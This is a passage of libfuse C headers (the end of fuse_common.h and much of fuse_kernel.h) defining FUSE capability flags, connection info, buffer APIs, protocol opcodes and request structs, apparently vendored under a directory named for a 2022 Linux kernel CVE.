* ensuring inheritance of default ACLs when new filesystem nodes are
* created. Note that this requires that the file system is able to
* parse and interpret the xattr representation of ACLs.
*
* Enabling this feature implicitly turns on the
* ``default_permissions`` mount option (even if it was not passed to
* mount(2)).
*
* This feature is disabled by default.
*/
#define FUSE_CAP_POSIX_ACL (1 << 19)
/**
* Indicates that the filesystem is responsible for unsetting
* setuid and setgid bits when a file is written, truncated, or
* its owner is changed.
*
* This feature is enabled by default when supported by the kernel.
*/
#define FUSE_CAP_HANDLE_KILLPRIV (1 << 20)
/**
* Indicates that the kernel supports caching symlinks in its page cache.
*
* When this feature is enabled, symlink targets are saved in the page cache.
* You can invalidate a cached link by calling:
* `fuse_lowlevel_notify_inval_inode(se, ino, 0, 0);`
*
* This feature is disabled by default.
* If the kernel supports it (>= 4.20), you can enable this feature by
* setting this flag in the `want` field of the `fuse_conn_info` structure.
*/
#define FUSE_CAP_CACHE_SYMLINKS (1 << 23)
/**
* Indicates support for zero-message opendirs. If this flag is set in
* the `capable` field of the `fuse_conn_info` structure, then the filesystem
* may return `ENOSYS` from the opendir() handler to indicate success. Further
* opendir and releasedir messages will be handled in the kernel. (If this
* flag is not set, returning ENOSYS will be treated as an error and signalled
* to the caller.)
*
* Setting (or unsetting) this flag in the `want` field has *no effect*.
*/
#define FUSE_CAP_NO_OPENDIR_SUPPORT (1 << 24)
/**
* Indicates support for invalidating cached pages only on explicit request.
*
* If this flag is set in the `capable` field of the `fuse_conn_info` structure,
* then the FUSE kernel module supports invalidating cached pages only on
* explicit request by the filesystem through fuse_lowlevel_notify_inval_inode()
* or fuse_invalidate_path().
*
* By setting this flag in the `want` field of the `fuse_conn_info` structure,
* the filesystem is responsible for invalidating cached pages through explicit
* requests to the kernel.
*
* Note that setting this flag does not prevent the cached pages from being
* flushed by OS itself and/or through user actions.
*
* Note that if both FUSE_CAP_EXPLICIT_INVAL_DATA and FUSE_CAP_AUTO_INVAL_DATA
* are set in the `capable` field of the `fuse_conn_info` structure then
* FUSE_CAP_AUTO_INVAL_DATA takes precedence.
*
* This feature is disabled by default.
*/
#define FUSE_CAP_EXPLICIT_INVAL_DATA (1 << 25)
/**
* Ioctl flags
*
* FUSE_IOCTL_COMPAT: 32bit compat ioctl on 64bit machine
* FUSE_IOCTL_UNRESTRICTED: not restricted to well-formed ioctls, retry allowed
* FUSE_IOCTL_RETRY: retry with new iovecs
* FUSE_IOCTL_DIR: is a directory
*
* FUSE_IOCTL_MAX_IOV: maximum of in_iovecs + out_iovecs
*/
#define FUSE_IOCTL_COMPAT (1 << 0)
#define FUSE_IOCTL_UNRESTRICTED (1 << 1)
#define FUSE_IOCTL_RETRY (1 << 2)
#define FUSE_IOCTL_DIR (1 << 4)
#define FUSE_IOCTL_MAX_IOV 256
/**
* Connection information, passed to the ->init() method
*
* Some of the elements are read-write, these can be changed to
* indicate the value requested by the filesystem. The requested
* value must usually be smaller than the indicated value.
*/
struct fuse_conn_info {
/**
* Major version of the protocol (read-only)
*/
unsigned proto_major;
/**
* Minor version of the protocol (read-only)
*/
unsigned proto_minor;
/**
* Maximum size of the write buffer
*/
unsigned max_write;
/**
* Maximum size of read requests. A value of zero indicates no
* limit. However, even if the filesystem does not specify a
* limit, the maximum size of read requests will still be
* limited by the kernel.
*
* NOTE: For the time being, the maximum size of read requests
* must be set both here *and* passed to fuse_session_new()
* using the ``-o max_read=<n>`` mount option. At some point
* in the future, specifying the mount option will no longer
* be necessary.
*/
unsigned max_read;
/**
* Maximum readahead
*/
unsigned max_readahead;
/**
* Capability flags that the kernel supports (read-only)
*/
unsigned capable;
/**
* Capability flags that the filesystem wants to enable.
*
* libfuse attempts to initialize this field with
* reasonable default values before calling the init() handler.
*/
unsigned want;
/**
* Maximum number of pending "background" requests. A
* background request is any type of request for which the
* total number is not limited by other means. As of kernel
* 4.8, only two types of requests fall into this category:
*
* 1. Read-ahead requests
* 2. Asynchronous direct I/O requests
*
* Read-ahead requests are generated (if max_readahead is
* non-zero) by the kernel to preemptively fill its caches
* when it anticipates that userspace will soon read more
* data.
*
* Asynchronous direct I/O requests are generated if
* FUSE_CAP_ASYNC_DIO is enabled and userspace submits a large
* direct I/O request. In this case the kernel will internally
* split it up into multiple smaller requests and submit them
* to the filesystem concurrently.
*
* Note that the following requests are *not* background
* requests: writeback requests (limited by the kernel's
* flusher algorithm), regular (i.e., synchronous and
* buffered) userspace read/write requests (limited to one per
* thread), asynchronous read requests (Linux's io_submit(2)
* call actually blocks, so these are also limited to one per
* thread).
*/
unsigned max_background;
/**
* Kernel congestion threshold parameter. If the number of pending
* background requests exceeds this number, the FUSE kernel module will
* mark the filesystem as "congested". This instructs the kernel to
* expect that queued requests will take some time to complete, and to
* adjust its algorithms accordingly (e.g. by putting a waiting thread
* to sleep instead of using a busy-loop).
*/
unsigned congestion_threshold;
/**
* When FUSE_CAP_WRITEBACK_CACHE is enabled, the kernel is responsible
* for updating mtime and ctime when write requests are received. The
* updated values are passed to the filesystem with setattr() requests.
* However, if the filesystem does not support the full resolution of
* the kernel timestamps (nanoseconds), the mtime and ctime values used
* by kernel and filesystem will differ (and result in an apparent
* change of times after a cache flush).
*
* To prevent this problem, this variable can be used to inform the
* kernel about the timestamp granularity supported by the file-system.
* The value should be power of 10. The default is 1, i.e. full
* nano-second resolution. Filesystems supporting only second resolution
* should set this to 1000000000.
*/
unsigned time_gran;
/**
* For future use.
*/
unsigned reserved[22];
};
struct fuse_session;
struct fuse_pollhandle;
struct fuse_conn_info_opts;
/**
* This function parses several command-line options that can be used
* to override elements of struct fuse_conn_info. The pointer returned
* by this function should be passed to the
* fuse_apply_conn_info_opts() method by the file system's init()
* handler.
*
* Before using this function, think twice if you really want these
* parameters to be adjustable from the command line. In most cases,
* they should be determined by the file system internally.
*
* The following options are recognized:
*
* -o max_write=N sets conn->max_write
* -o max_readahead=N sets conn->max_readahead
* -o max_background=N sets conn->max_background
* -o congestion_threshold=N sets conn->congestion_threshold
* -o async_read sets FUSE_CAP_ASYNC_READ in conn->want
* -o sync_read unsets FUSE_CAP_ASYNC_READ in conn->want
* -o atomic_o_trunc sets FUSE_CAP_ATOMIC_O_TRUNC in conn->want
* -o no_remote_lock Equivalent to -o no_remote_flock,no_remote_posix_lock
* -o no_remote_flock Unsets FUSE_CAP_FLOCK_LOCKS in conn->want
* -o no_remote_posix_lock Unsets FUSE_CAP_POSIX_LOCKS in conn->want
* -o [no_]splice_write (un-)sets FUSE_CAP_SPLICE_WRITE in conn->want
* -o [no_]splice_move (un-)sets FUSE_CAP_SPLICE_MOVE in conn->want
* -o [no_]splice_read (un-)sets FUSE_CAP_SPLICE_READ in conn->want
* -o [no_]auto_inval_data (un-)sets FUSE_CAP_AUTO_INVAL_DATA in conn->want
* -o readdirplus=no unsets FUSE_CAP_READDIRPLUS in conn->want
* -o readdirplus=yes sets FUSE_CAP_READDIRPLUS and unsets
* FUSE_CAP_READDIRPLUS_AUTO in conn->want
* -o readdirplus=auto sets FUSE_CAP_READDIRPLUS and
* FUSE_CAP_READDIRPLUS_AUTO in conn->want
* -o [no_]async_dio (un-)sets FUSE_CAP_ASYNC_DIO in conn->want
* -o [no_]writeback_cache (un-)sets FUSE_CAP_WRITEBACK_CACHE in conn->want
* -o time_gran=N sets conn->time_gran
*
* Known options will be removed from *args*, unknown options will be
* passed through unchanged.
*
* @param args argument vector (input+output)
* @return parsed options
**/
struct fuse_conn_info_opts* fuse_parse_conn_info_opts(struct fuse_args *args);
/**
* This function applies the (parsed) parameters in *opts* to the
* *conn* pointer. It may modify the following fields: wants,
* max_write, max_readahead, congestion_threshold, max_background,
* time_gran. A field is only set (or unset) if the corresponding
* option has been explicitly set.
*/
void fuse_apply_conn_info_opts(struct fuse_conn_info_opts *opts,
struct fuse_conn_info *conn);
/**
* Go into the background
*
* @param foreground if true, stay in the foreground
* @return 0 on success, -1 on failure
*/
int fuse_daemonize(int foreground);
/**
* Get the version of the library
*
* @return the version
*/
int fuse_version(void);
/**
* Get the full package version string of the library
*
* @return the package version
*/
const char *fuse_pkgversion(void);
/**
* Destroy poll handle
*
* @param ph the poll handle
*/
void fuse_pollhandle_destroy(struct fuse_pollhandle *ph);
/* ----------------------------------------------------------- *
* Data buffer *
* ----------------------------------------------------------- */
/**
* Buffer flags
*/
enum fuse_buf_flags {
/**
* Buffer contains a file descriptor
*
* If this flag is set, the .fd field is valid, otherwise the
* .mem fields is valid.
*/
FUSE_BUF_IS_FD = (1 << 1),
/**
* Seek on the file descriptor
*
* If this flag is set then the .pos field is valid and is
* used to seek to the given offset before performing
* operation on file descriptor.
*/
FUSE_BUF_FD_SEEK = (1 << 2),
/**
* Retry operation on file descriptor
*
* If this flag is set then retry operation on file descriptor
* until .size bytes have been copied or an error or EOF is
* detected.
*/
FUSE_BUF_FD_RETRY = (1 << 3)
};
/**
* Buffer copy flags
*/
enum fuse_buf_copy_flags {
/**
* Don't use splice(2)
*
* Always fall back to using read and write instead of
* splice(2) to copy data from one file descriptor to another.
*
* If this flag is not set, then only fall back if splice is
* unavailable.
*/
FUSE_BUF_NO_SPLICE = (1 << 1),
/**
* Force splice
*
* Always use splice(2) to copy data from one file descriptor
* to another. If splice is not available, return -EINVAL.
*/
FUSE_BUF_FORCE_SPLICE = (1 << 2),
/**
* Try to move data with splice.
*
* If splice is used, try to move pages from the source to the
* destination instead of copying. See documentation of
* SPLICE_F_MOVE in splice(2) man page.
*/
FUSE_BUF_SPLICE_MOVE = (1 << 3),
/**
* Don't block on the pipe when copying data with splice
*
* Makes the operations on the pipe non-blocking (if the pipe
* is full or empty). See SPLICE_F_NONBLOCK in the splice(2)
* man page.
*/
FUSE_BUF_SPLICE_NONBLOCK= (1 << 4)
};
/**
* Single data buffer
*
* Generic data buffer for I/O, extended attributes, etc... Data may
* be supplied as a memory pointer or as a file descriptor
*/
struct fuse_buf {
/**
* Size of data in bytes
*/
size_t size;
/**
* Buffer flags
*/
enum fuse_buf_flags flags;
/**
* Memory pointer
*
* Used unless FUSE_BUF_IS_FD flag is set.
*/
void *mem;
/**
* File descriptor
*
* Used if FUSE_BUF_IS_FD flag is set.
*/
int fd;
/**
* File position
*
* Used if FUSE_BUF_FD_SEEK flag is set.
*/
off_t pos;
};
/**
* Data buffer vector
*
* An array of data buffers, each containing a memory pointer or a
* file descriptor.
*
* Allocate dynamically to add more than one buffer.
*/
struct fuse_bufvec {
/**
* Number of buffers in the array
*/
size_t count;
/**
* Index of current buffer within the array
*/
size_t idx;
/**
* Current offset within the current buffer
*/
size_t off;
/**
* Array of buffers
*/
struct fuse_buf buf[1];
};
/* Initialize bufvec with a single buffer of given size */
#define FUSE_BUFVEC_INIT(size__) \
((struct fuse_bufvec) { \
/* .count= */ 1, \
/* .idx = */ 0, \
/* .off = */ 0, \
/* .buf = */ { /* [0] = */ { \
/* .size = */ (size__), \
/* .flags = */ (enum fuse_buf_flags) 0, \
/* .mem = */ NULL, \
/* .fd = */ -1, \
/* .pos = */ 0, \
} } \
} )
/**
* Get total size of data in a fuse buffer vector
*
* @param bufv buffer vector
* @return size of data
*/
size_t fuse_buf_size(const struct fuse_bufvec *bufv);
/**
* Copy data from one buffer vector to another
*
* @param dst destination buffer vector
* @param src source buffer vector
* @param flags flags controlling the copy
* @return actual number of bytes copied or -errno on error
*/
ssize_t fuse_buf_copy(struct fuse_bufvec *dst, struct fuse_bufvec *src,
enum fuse_buf_copy_flags flags);
/* ----------------------------------------------------------- *
* Signal handling *
* ----------------------------------------------------------- */
/**
* Exit session on HUP, TERM and INT signals and ignore PIPE signal
*
* Stores session in a global variable. May only be called once per
* process until fuse_remove_signal_handlers() is called.
*
* Once either of the POSIX signals arrives, the signal handler calls
* fuse_session_exit().
*
* @param se the session to exit
* @return 0 on success, -1 on failure
*
* See also:
* fuse_remove_signal_handlers()
*/
int fuse_set_signal_handlers(struct fuse_session *se);
/**
* Restore default signal handlers
*
* Resets global session. After this fuse_set_signal_handlers() may
* be called again.
*
* @param se the same session as given in fuse_set_signal_handlers()
*
* See also:
* fuse_set_signal_handlers()
*/
void fuse_remove_signal_handlers(struct fuse_session *se);
/* ----------------------------------------------------------- *
* Compatibility stuff *
* ----------------------------------------------------------- */
#if !defined(FUSE_USE_VERSION) || FUSE_USE_VERSION < 30
# error only API version 30 or greater is supported
#endif
#ifdef __cplusplus
}
#endif
/*
* This interface uses 64 bit off_t.
*
* On 32bit systems please add -D_FILE_OFFSET_BITS=64 to your compile flags!
*/
#if defined(__GNUC__) && (__GNUC__ > 4 || __GNUC__ == 4 && __GNUC_MINOR__ >= 6) && !defined __cplusplus
_Static_assert(sizeof(off_t) == 8, "fuse: off_t must be 64bit");
#else
struct _fuse_off_t_must_be_64bit_dummy_struct \
{ unsigned _fuse_off_t_must_be_64bit:((sizeof(off_t) == 8) ? 1 : -1); };
#endif
#endif /* FUSE_COMMON_H_ */

848
cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_kernel.h Normal file
View File

@ -0,0 +1,848 @@
/* SPDX-License-Identifier: ((GPL-2.0 WITH Linux-syscall-note) OR BSD-2-Clause) */
/*
This file defines the kernel interface of FUSE
Copyright (C) 2001-2008 Miklos Szeredi <miklos@szeredi.hu>
This program can be distributed under the terms of the GNU GPL.
See the file COPYING.
This -- and only this -- header file may also be distributed under
the terms of the BSD Licence as follows:
Copyright (C) 2001-2007 Miklos Szeredi. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY AUTHOR AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL AUTHOR OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
*/
/*
* This file defines the kernel interface of FUSE
*
* Protocol changelog:
*
* 7.9:
* - new fuse_getattr_in input argument of GETATTR
* - add lk_flags in fuse_lk_in
* - add lock_owner field to fuse_setattr_in, fuse_read_in and fuse_write_in
* - add blksize field to fuse_attr
* - add file flags field to fuse_read_in and fuse_write_in
* - Add ATIME_NOW and MTIME_NOW flags to fuse_setattr_in
*
* 7.10
* - add nonseekable open flag
*
* 7.11
* - add IOCTL message
* - add unsolicited notification support
* - add POLL message and NOTIFY_POLL notification
*
* 7.12
* - add umask flag to input argument of create, mknod and mkdir
* - add notification messages for invalidation of inodes and
* directory entries
*
* 7.13
* - make max number of background requests and congestion threshold
* tunables
*
* 7.14
* - add splice support to fuse device
*
* 7.15
* - add store notify
* - add retrieve notify
*
* 7.16
* - add BATCH_FORGET request
* - FUSE_IOCTL_UNRESTRICTED shall now return with array of 'struct
* fuse_ioctl_iovec' instead of ambiguous 'struct iovec'
* - add FUSE_IOCTL_32BIT flag
*
* 7.17
* - add FUSE_FLOCK_LOCKS and FUSE_RELEASE_FLOCK_UNLOCK
*
* 7.18
* - add FUSE_IOCTL_DIR flag
* - add FUSE_NOTIFY_DELETE
*
* 7.19
* - add FUSE_FALLOCATE
*
* 7.20
* - add FUSE_AUTO_INVAL_DATA
*
* 7.21
* - add FUSE_READDIRPLUS
* - send the requested events in POLL request
*
* 7.22
* - add FUSE_ASYNC_DIO
*
* 7.23
* - add FUSE_WRITEBACK_CACHE
* - add time_gran to fuse_init_out
* - add reserved space to fuse_init_out
* - add FATTR_CTIME
* - add ctime and ctimensec to fuse_setattr_in
* - add FUSE_RENAME2 request
* - add FUSE_NO_OPEN_SUPPORT flag
*
* 7.24
* - add FUSE_LSEEK for SEEK_HOLE and SEEK_DATA support
*
* 7.25
* - add FUSE_PARALLEL_DIROPS
*
* 7.26
* - add FUSE_HANDLE_KILLPRIV
* - add FUSE_POSIX_ACL
*
* 7.27
* - add FUSE_ABORT_ERROR
*
* 7.28
* - add FUSE_COPY_FILE_RANGE
* - add FOPEN_CACHE_DIR
* - add FUSE_MAX_PAGES, add max_pages to init_out
* - add FUSE_CACHE_SYMLINKS
*
* 7.29
* - add FUSE_NO_OPENDIR_SUPPORT flag
*
* 7.30
* - add FUSE_EXPLICIT_INVAL_DATA
* - add FUSE_IOCTL_COMPAT_X32
*
* 7.31
* - add FUSE_WRITE_KILL_PRIV flag
*/
#ifndef _LINUX_FUSE_H
#define _LINUX_FUSE_H
#ifdef __KERNEL__
#include <linux/types.h>
#else
#include <stdint.h>
#endif
/*
* Version negotiation:
*
* Both the kernel and userspace send the version they support in the
* INIT request and reply respectively.
*
* If the major versions match then both shall use the smallest
* of the two minor versions for communication.
*
* If the kernel supports a larger major version, then userspace shall
* reply with the major version it supports, ignore the rest of the
* INIT message and expect a new INIT message from the kernel with a
* matching major version.
*
* If the library supports a larger major version, then it shall fall
* back to the major protocol version sent by the kernel for
* communication and reply with that major version (and an arbitrary
* supported minor version).
*/
/** Version number of this interface */
#define FUSE_KERNEL_VERSION 7
/** Minor version number of this interface */
#define FUSE_KERNEL_MINOR_VERSION 31
/** The node ID of the root inode */
#define FUSE_ROOT_ID 1
/* Make sure all structures are padded to 64bit boundary, so 32bit
userspace works under 64bit kernels */
struct fuse_attr {
uint64_t ino;
uint64_t size;
uint64_t blocks;
uint64_t atime;
uint64_t mtime;
uint64_t ctime;
uint32_t atimensec;
uint32_t mtimensec;
uint32_t ctimensec;
uint32_t mode;
uint32_t nlink;
uint32_t uid;
uint32_t gid;
uint32_t rdev;
uint32_t blksize;
uint32_t padding;
};
struct fuse_kstatfs {
uint64_t blocks;
uint64_t bfree;
uint64_t bavail;
uint64_t files;
uint64_t ffree;
uint32_t bsize;
uint32_t namelen;
uint32_t frsize;
uint32_t padding;
uint32_t spare[6];
};
struct fuse_file_lock {
uint64_t start;
uint64_t end;
uint32_t type;
uint32_t pid; /* tgid */
};
/**
* Bitmasks for fuse_setattr_in.valid
*/
#define FATTR_MODE (1 << 0)
#define FATTR_UID (1 << 1)
#define FATTR_GID (1 << 2)
#define FATTR_SIZE (1 << 3)
#define FATTR_ATIME (1 << 4)
#define FATTR_MTIME (1 << 5)
#define FATTR_FH (1 << 6)
#define FATTR_ATIME_NOW (1 << 7)
#define FATTR_MTIME_NOW (1 << 8)
#define FATTR_LOCKOWNER (1 << 9)
#define FATTR_CTIME (1 << 10)
/**
* Flags returned by the OPEN request
*
* FOPEN_DIRECT_IO: bypass page cache for this open file
* FOPEN_KEEP_CACHE: don't invalidate the data cache on open
* FOPEN_NONSEEKABLE: the file is not seekable
* FOPEN_CACHE_DIR: allow caching this directory
* FOPEN_STREAM: the file is stream-like (no file position at all)
*/
#define FOPEN_DIRECT_IO (1 << 0)
#define FOPEN_KEEP_CACHE (1 << 1)
#define FOPEN_NONSEEKABLE (1 << 2)
#define FOPEN_CACHE_DIR (1 << 3)
#define FOPEN_STREAM (1 << 4)
/**
* INIT request/reply flags
*
* FUSE_ASYNC_READ: asynchronous read requests
* FUSE_POSIX_LOCKS: remote locking for POSIX file locks
* FUSE_FILE_OPS: kernel sends file handle for fstat, etc... (not yet supported)
* FUSE_ATOMIC_O_TRUNC: handles the O_TRUNC open flag in the filesystem
* FUSE_EXPORT_SUPPORT: filesystem handles lookups of "." and ".."
* FUSE_BIG_WRITES: filesystem can handle write size larger than 4kB
* FUSE_DONT_MASK: don't apply umask to file mode on create operations
* FUSE_SPLICE_WRITE: kernel supports splice write on the device
* FUSE_SPLICE_MOVE: kernel supports splice move on the device
* FUSE_SPLICE_READ: kernel supports splice read on the device
* FUSE_FLOCK_LOCKS: remote locking for BSD style file locks
* FUSE_HAS_IOCTL_DIR: kernel supports ioctl on directories
* FUSE_AUTO_INVAL_DATA: automatically invalidate cached pages
* FUSE_DO_READDIRPLUS: do READDIRPLUS (READDIR+LOOKUP in one)
* FUSE_READDIRPLUS_AUTO: adaptive readdirplus
* FUSE_ASYNC_DIO: asynchronous direct I/O submission
* FUSE_WRITEBACK_CACHE: use writeback cache for buffered writes
* FUSE_NO_OPEN_SUPPORT: kernel supports zero-message opens
* FUSE_PARALLEL_DIROPS: allow parallel lookups and readdir
* FUSE_HANDLE_KILLPRIV: fs handles killing suid/sgid/cap on write/chown/trunc
* FUSE_POSIX_ACL: filesystem supports posix acls
* FUSE_ABORT_ERROR: reading the device after abort returns ECONNABORTED
* FUSE_MAX_PAGES: init_out.max_pages contains the max number of req pages
* FUSE_CACHE_SYMLINKS: cache READLINK responses
* FUSE_NO_OPENDIR_SUPPORT: kernel supports zero-message opendir
* FUSE_EXPLICIT_INVAL_DATA: only invalidate cached pages on explicit request
*/
#define FUSE_ASYNC_READ (1 << 0)
#define FUSE_POSIX_LOCKS (1 << 1)
#define FUSE_FILE_OPS (1 << 2)
#define FUSE_ATOMIC_O_TRUNC (1 << 3)
#define FUSE_EXPORT_SUPPORT (1 << 4)
#define FUSE_BIG_WRITES (1 << 5)
#define FUSE_DONT_MASK (1 << 6)
#define FUSE_SPLICE_WRITE (1 << 7)
#define FUSE_SPLICE_MOVE (1 << 8)
#define FUSE_SPLICE_READ (1 << 9)
#define FUSE_FLOCK_LOCKS (1 << 10)
#define FUSE_HAS_IOCTL_DIR (1 << 11)
#define FUSE_AUTO_INVAL_DATA (1 << 12)
#define FUSE_DO_READDIRPLUS (1 << 13)
#define FUSE_READDIRPLUS_AUTO (1 << 14)
#define FUSE_ASYNC_DIO (1 << 15)
#define FUSE_WRITEBACK_CACHE (1 << 16)
#define FUSE_NO_OPEN_SUPPORT (1 << 17)
#define FUSE_PARALLEL_DIROPS (1 << 18)
#define FUSE_HANDLE_KILLPRIV (1 << 19)
#define FUSE_POSIX_ACL (1 << 20)
#define FUSE_ABORT_ERROR (1 << 21)
#define FUSE_MAX_PAGES (1 << 22)
#define FUSE_CACHE_SYMLINKS (1 << 23)
#define FUSE_NO_OPENDIR_SUPPORT (1 << 24)
#define FUSE_EXPLICIT_INVAL_DATA (1 << 25)
/**
* CUSE INIT request/reply flags
*
* CUSE_UNRESTRICTED_IOCTL: use unrestricted ioctl
*/
#define CUSE_UNRESTRICTED_IOCTL (1 << 0)
/**
* Release flags
*/
#define FUSE_RELEASE_FLUSH (1 << 0)
#define FUSE_RELEASE_FLOCK_UNLOCK (1 << 1)
/**
* Getattr flags
*/
#define FUSE_GETATTR_FH (1 << 0)
/**
* Lock flags
*/
#define FUSE_LK_FLOCK (1 << 0)
/**
* WRITE flags
*
* FUSE_WRITE_CACHE: delayed write from page cache, file handle is guessed
* FUSE_WRITE_LOCKOWNER: lock_owner field is valid
* FUSE_WRITE_KILL_PRIV: kill suid and sgid bits
*/
#define FUSE_WRITE_CACHE (1 << 0)
#define FUSE_WRITE_LOCKOWNER (1 << 1)
#define FUSE_WRITE_KILL_PRIV (1 << 2)
/**
* Read flags
*/
#define FUSE_READ_LOCKOWNER (1 << 1)
/**
* Ioctl flags
*
* FUSE_IOCTL_COMPAT: 32bit compat ioctl on 64bit machine
* FUSE_IOCTL_UNRESTRICTED: not restricted to well-formed ioctls, retry allowed
* FUSE_IOCTL_RETRY: retry with new iovecs
* FUSE_IOCTL_32BIT: 32bit ioctl
* FUSE_IOCTL_DIR: is a directory
* FUSE_IOCTL_COMPAT_X32: x32 compat ioctl on 64bit machine (64bit time_t)
*
* FUSE_IOCTL_MAX_IOV: maximum of in_iovecs + out_iovecs
*/
#define FUSE_IOCTL_COMPAT (1 << 0)
#define FUSE_IOCTL_UNRESTRICTED (1 << 1)
#define FUSE_IOCTL_RETRY (1 << 2)
#define FUSE_IOCTL_32BIT (1 << 3)
#define FUSE_IOCTL_DIR (1 << 4)
#define FUSE_IOCTL_COMPAT_X32 (1 << 5)
#define FUSE_IOCTL_MAX_IOV 256
/**
* Poll flags
*
* FUSE_POLL_SCHEDULE_NOTIFY: request poll notify
*/
#define FUSE_POLL_SCHEDULE_NOTIFY (1 << 0)
/**
* Fsync flags
*
* FUSE_FSYNC_FDATASYNC: Sync data only, not metadata
*/
#define FUSE_FSYNC_FDATASYNC (1 << 0)
enum fuse_opcode {
FUSE_LOOKUP = 1,
FUSE_FORGET = 2, /* no reply */
FUSE_GETATTR = 3,
FUSE_SETATTR = 4,
FUSE_READLINK = 5,
FUSE_SYMLINK = 6,
FUSE_MKNOD = 8,
FUSE_MKDIR = 9,
FUSE_UNLINK = 10,
FUSE_RMDIR = 11,
FUSE_RENAME = 12,
FUSE_LINK = 13,
FUSE_OPEN = 14,
FUSE_READ = 15,
FUSE_WRITE = 16,
FUSE_STATFS = 17,
FUSE_RELEASE = 18,
FUSE_FSYNC = 20,
FUSE_SETXATTR = 21,
FUSE_GETXATTR = 22,
FUSE_LISTXATTR = 23,
FUSE_REMOVEXATTR = 24,
FUSE_FLUSH = 25,
FUSE_INIT = 26,
FUSE_OPENDIR = 27,
FUSE_READDIR = 28,
FUSE_RELEASEDIR = 29,
FUSE_FSYNCDIR = 30,
FUSE_GETLK = 31,
FUSE_SETLK = 32,
FUSE_SETLKW = 33,
FUSE_ACCESS = 34,
FUSE_CREATE = 35,
FUSE_INTERRUPT = 36,
FUSE_BMAP = 37,
FUSE_DESTROY = 38,
FUSE_IOCTL = 39,
FUSE_POLL = 40,
FUSE_NOTIFY_REPLY = 41,
FUSE_BATCH_FORGET = 42,
FUSE_FALLOCATE = 43,
FUSE_READDIRPLUS = 44,
FUSE_RENAME2 = 45,
FUSE_LSEEK = 46,
FUSE_COPY_FILE_RANGE = 47,
/* CUSE specific operations */
CUSE_INIT = 4096
};
enum fuse_notify_code {
FUSE_NOTIFY_POLL = 1,
FUSE_NOTIFY_INVAL_INODE = 2,
FUSE_NOTIFY_INVAL_ENTRY = 3,
FUSE_NOTIFY_STORE = 4,
FUSE_NOTIFY_RETRIEVE = 5,
FUSE_NOTIFY_DELETE = 6,
FUSE_NOTIFY_CODE_MAX
};
/* The read buffer is required to be at least 8k, but may be much larger */
#define FUSE_MIN_READ_BUFFER 8192
#define FUSE_COMPAT_ENTRY_OUT_SIZE 120
struct fuse_entry_out {
uint64_t nodeid; /* Inode ID */
uint64_t generation; /* Inode generation: nodeid:gen must
be unique for the fs's lifetime */
uint64_t entry_valid; /* Cache timeout for the name */
uint64_t attr_valid; /* Cache timeout for the attributes */
uint32_t entry_valid_nsec;
uint32_t attr_valid_nsec;
struct fuse_attr attr;
};
struct fuse_forget_in {
uint64_t nlookup;
};
struct fuse_forget_one {
uint64_t nodeid;
uint64_t nlookup;
};
struct fuse_batch_forget_in {
uint32_t count;
uint32_t dummy;
};
struct fuse_getattr_in {
uint32_t getattr_flags;
uint32_t dummy;
uint64_t fh;
};
#define FUSE_COMPAT_ATTR_OUT_SIZE 96
struct fuse_attr_out {
uint64_t attr_valid; /* Cache timeout for the attributes */
uint32_t attr_valid_nsec;
uint32_t dummy;
struct fuse_attr attr;
};
#define FUSE_COMPAT_MKNOD_IN_SIZE 8
struct fuse_mknod_in {
uint32_t mode;
uint32_t rdev;
uint32_t umask;
uint32_t padding;
};
struct fuse_mkdir_in {
uint32_t mode;
uint32_t umask;
};
struct fuse_rename_in {
uint64_t newdir;
};
struct fuse_rename2_in {
uint64_t newdir;
uint32_t flags;
uint32_t padding;
};
struct fuse_link_in {
uint64_t oldnodeid;
};
struct fuse_setattr_in {
uint32_t valid;
uint32_t padding;
uint64_t fh;
uint64_t size;
uint64_t lock_owner;
uint64_t atime;
uint64_t mtime;
uint64_t ctime;
uint32_t atimensec;
uint32_t mtimensec;
uint32_t ctimensec;
uint32_t mode;
uint32_t unused4;
uint32_t uid;
uint32_t gid;
uint32_t unused5;
};
struct fuse_open_in {
uint32_t flags;
uint32_t unused;
};
struct fuse_create_in {
uint32_t flags;
uint32_t mode;
uint32_t umask;
uint32_t padding;
};
struct fuse_open_out {
uint64_t fh;
uint32_t open_flags;
uint32_t padding;
};
struct fuse_release_in {
uint64_t fh;
uint32_t flags;
uint32_t release_flags;
uint64_t lock_owner;
};
struct fuse_flush_in {
uint64_t fh;
uint32_t unused;
uint32_t padding;
uint64_t lock_owner;
};
struct fuse_read_in {
uint64_t fh;
uint64_t offset;
uint32_t size;
uint32_t read_flags;
uint64_t lock_owner;
uint32_t flags;
uint32_t padding;
};
#define FUSE_COMPAT_WRITE_IN_SIZE 24
struct fuse_write_in {
uint64_t fh;
uint64_t offset;
uint32_t size;
uint32_t write_flags;
uint64_t lock_owner;
uint32_t flags;
uint32_t padding;
};
struct fuse_write_out {
uint32_t size;
uint32_t padding;
};
#define FUSE_COMPAT_STATFS_SIZE 48
struct fuse_statfs_out {
struct fuse_kstatfs st;
};
struct fuse_fsync_in {
uint64_t fh;
uint32_t fsync_flags;
uint32_t padding;
};
struct fuse_setxattr_in {
uint32_t size;
uint32_t flags;
};
struct fuse_getxattr_in {
uint32_t size;
uint32_t padding;
};
struct fuse_getxattr_out {
uint32_t size;
uint32_t padding;
};
struct fuse_lk_in {
uint64_t fh;
uint64_t owner;
struct fuse_file_lock lk;
uint32_t lk_flags;
